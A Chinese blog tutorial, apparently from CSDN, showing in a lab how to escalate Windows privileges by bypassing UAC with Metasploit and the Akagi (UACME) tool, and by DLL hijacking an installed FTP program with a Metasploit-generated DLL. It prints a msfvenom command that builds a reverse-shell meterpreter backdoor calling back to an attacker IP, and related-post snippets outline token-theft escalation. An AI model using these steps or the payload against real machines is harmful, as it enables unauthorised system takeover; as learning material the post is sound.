Windows提权&BypassUAC&Dll劫持

已于 2024-01-17 19:31:49 修改
阅读量858 收藏 20
点赞数 24
文章标签: windows 学习方法 网络安全 系统安全 web安全 计算机网络
于 2024-01-17 19:28:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39953838/article/details/135649522
版权

此文章仅用于学习交流,作者不为此承担任何责任,一切违法活动造成后果自负。

一:环境

        win10+开启了UAC(默认开启)

        win10+web+安装了一些程序,运行时会加载dll

二:BypassUac提权

        UAC全称为 User Account Control,用户账户控制,在win7以后的产品都是有这个东西的。这个东西就是在我们打开一些程序时候,会弹出一些提示。

        思考:当我们取得shell后,我们要运行一些程序,但是打开的时候我们在shell中看不到提示,所以我们就要绕过UAC,使得直接就可以运行程序。

MSF+Akagi绕过UAC

        我们首先使用msf生成一个后门文件,上传到被攻击机中,模拟已经上线。

         生成后门程序。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.246.128 LPORT=4444 -f exe -o f.exe

        上传到被攻击机

        设置msf监听。

        上线msf,查看当前权限为administrators,我们提权到system。

        我们使用自动提权getsystem,发现直接报错,提不上

        其实到这里我们可以用msf自带的模块去绕过UAC,但是我自己尝试了很多个都是没有session的产生也不知道为啥。

        所以我们使用MSF+Akagi来绕过UAC

        Akagi为编译好的UACME项目

        UACME项目地址: https://github.com/hfiref0x/UACME

        我们提前把Akagi.exe上传到被攻击机。

        然后在msf中使用它去执行msf的后门文件,同时我们再开一个msf监听。

        Akagi64.exe使用命令:

                                             Akagi64.exe 绕过方法编号   #执行system权限的cmd

                                              Akagi64.exe 绕过方法编号  后门地址  #运行指定的程序

        可以看到新开的MSF上线了。

        我们直接提权成功。

    

二:DLL劫持

        我们首先模拟取得了web权限,发现c盘下安装的ftp软件

        如果说web权限对其他目录没有RW权限,这个dll劫持就不会成功。

        我们通过信息搜集找到了版本信息,在自己电脑上下载此程序。

        我们下载之后使用火绒剑进行分析,看程序在执行时候加载了什么dll。

        系统文件我们不能更改,我们只能利用数字签名文件或者未知文件。

        然后我们再用工具验证一下,可以看到他让我们尝试。

        使用msf生成一个dll文件,上传到服务器,替换原来的dll文件。

        上传替代原来的dll文件,这里我把原来dll文件名改成了321,我们上传的替代原来的。

        然后msf起一个监听,在被攻击机中重新运行程序。

        此时msf就上线了,我们msf生成的dll文件在程序启动时被启用了就。

最后:

        一个姑娘,如果有被人喜欢,而且那个人喜欢的干干净净,怎么都是一件好事!

想吃冰淇淋!
关注
  • 24
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
权限提升——windows进程注入&令牌窃取&土豆&BypassUAC&DLL文件劫持&不带引号服务路径
m0_61506558的博客
01-15 854
RottenPotato (烂土豆)提权的原理可以简述如下: 1.欺骗“NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。 2.对这个认证过程使用中间人攻击(NTLM重放),为“NTAUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通过—系列的Windows API调用实现的。 3.模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。
depends&dllexp工具查看C++DLL的函数表
08-24
depends&dllexp工具查看C++DLL的函数表,非常实用欢迎下载.depends&dllexp工具查看C++DLL的函数表,非常实用欢迎下载.
Aspose.Words.dll&&System.Drawing.dll
02-28
unity利用Aspose.words读写word的相关dll文件,net.3.5平台
windows提权BypassUAC&DLL劫持&引号路径&服务权限提权
m0_62207170的博客
03-21 1121
windows提权BypassUAC&DLL劫持&引号路径&服务权限提权
【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限
今天是几号的博客
02-24 1300
如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL提权。上方dll文件在C:\Windows目录下,普通用户权限不够,不能够劫持。注意:如果你经常安装新软件或访问不熟悉的网站,但更改 Windows 设置时不希望收到通知,则建议使用此选项。注意:如果需要花费很长时间才能降低计算机上的桌面亮度时,才建议选择此选项。注意:如果你经常安装新软件或访问陌生网站,则推荐使用此选项。利用火绒剑进行进程分析加载DLL,一般寻程序DLL利用。当你对 Windows 设置进行更改时不通知你。
Windows权限提升—BypassUACDLL劫持、引号路径、服务权限等提权
剁椒鱼头没剁椒的博客
03-29 1652
关于Windows提权应该这篇总结完就结束了,再次提醒一下关于第三方软件或插件提权,不是不写,而且有些软件都会自动更新,很多漏洞基本上很少遇到,同时也利用不了,比如说:向日葵有一个版本能够提权,但是现在那个版本装再电脑上,根本连接不上向日葵的服务器,更何谈提权呢,同时还可以看日志,目前日志也更改了,端口不会再日志中出现了。前面几篇文章我就汇总在下面了,同时关于UAC提权之前一篇文章写的没那么细,这里重新补充一下。Windows权限提升—令牌窃取、UAC提权、进程注入等提权
第102天:权限提升-WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限
qq_46081990的博客
06-22 286
【代码】第102天:权限提升-WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限。
DccwBypassUACWindows 8.1和10 UAC绕过“ dccw.exe”中的WinSxS
02-06
DccwBypassUACWindows 8.1和10 UAC绕过“ dccw.exe”中的WinSxS
windows libiconv2.dll
10-08
32位放到c:/windows/system32,64位放到c:/windows/syswow64,也可以直接regsvr32 regex2.dll,如果注册不了放到c盘重启电脑
System.Windows.Interactivity.dll
04-19
EventToCommand 事件转命令,需要引用外部插件bll外部插件:System.Windows.Interactivity.dll 用法:把这个dll文件放到项目文件中的bin目录下Debug文件夹中
《C++primer》读书笔记---第九章:顺序容器
最新发布
m0_74384466的博客
05-30 1039
每个容器都定义了一个默认构造函数。除array外,其它容器默认构造函数都会创建一个指定类型的空容器,且都可以接受指定容器大小和元素初始值的参数将一个新容器创建为另一个容器的拷贝的方法有两种:可以直接拷贝整个容器,或者(array除外)拷贝由一个迭代器对指定的范围。为了创建一个容器为另一个容器的拷贝时,两个容器的类型及其元素类型必须匹配。不过,当传递迭代器参数来拷贝一个范围时,就不要求容器类型是相同的了。//每个容器都有三个元素,用给定的初始化器进行初始化//正确,类型匹配。
Flutter 中的 SliverFixedExtentList 小部件:全面指南
smileKH的博客
05-30 308
您可以使用来控制的滚动行为,包括的滚动。
Java-Collection家族(List接口)
weixin_47234283的博客
05-30 307
​ 有序且可重复(因为List接口中添加了许多针对下标操作的方法)​ 继承关系:class Stack extends Vector。​ 特点:队列模式、栈模式。​ 数据结构:一维数组。​ 数据结构:双向列表。​ 数据结构:一维数组。​ 特点:存储数据。​ 特点:线程安全
python 第四章 函数 (pycharm) (1)
m0_62008384的博客
05-27 635
函数中三要素函数名 必须定义参数 (可选)将数据传递函数中使用返回值 (可选)将函数中的数据传递外部进行使用# 函数的介绍# 功能1def login(name_list,password_list): # 接受参数# 函数作用域# 通过四个空格,来确认函数所执行的逻辑从哪里开始name = input('请输入用户名:')password = input('请输入密码:')# 先判断用户名是否正确# 在判断密码是否正确print('登录成功')
【Qt】【模型视图架构】 在项目视图中启用拖放
sinat_41752325的博客
05-30 766
Qt对视图中的项的拖放操作支持。
【链表】Leetcode 86. 分隔链表【中等】
FLGB
05-30 495
你应当 保留 两个分区中每个节点的初始相对位置。
代码随想录(二叉树)
weixin_47059164的博客
05-29 316
对称二叉树(Leetcode101)翻转二叉树(Leetcode226)每个树行中找最大值(Leetcode515) 二叉树的递归遍历 二叉树的迭代遍历 二叉数的层序遍历二叉树的右视图(Leetcode199)二叉树的层序遍历2(Leetcode107) 二叉数的层序遍历(Leetcode102)二叉树的层平均值(Leetcode637)N叉树的层序遍历(Leetcode429) 二叉树的层平均值(Leetcode637)填充每个节点的下一个右侧节点(Leetcode116)
scripts/Makefile.host 分析【fixdep、conf】
weixin_51459644的博客
05-30 491
所以第75行条件成立,执行第76行,第76行中的 $(_hostc_flags) 在第70行中定义,其中的。第92行:$(HOSTCC) 在顶层 Makefile 的282行定义。,在 scripts/basic/Makefile 中定义。,又在 Makefile.build 中第57行引用。第83行:$(__hostc_flags),当输入。,其目录下存在此类文件【fixdep.c】,经过。第24行:由于顶层 Makefile 中执行。分析,第95行实际是打印并执行。函数,并将相应内容输入到。
CTF windows 提权
09-06
4. DLL劫持:通过在系统中替换可执行文件所需要的动态链接库(DLL),使得恶意DLL被加载并执行,从而进行提权。 5. 特权升级:在系统中寻找已经拥有一定权限的进程,然后通过一些方法提升这些进程的权限,比如利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值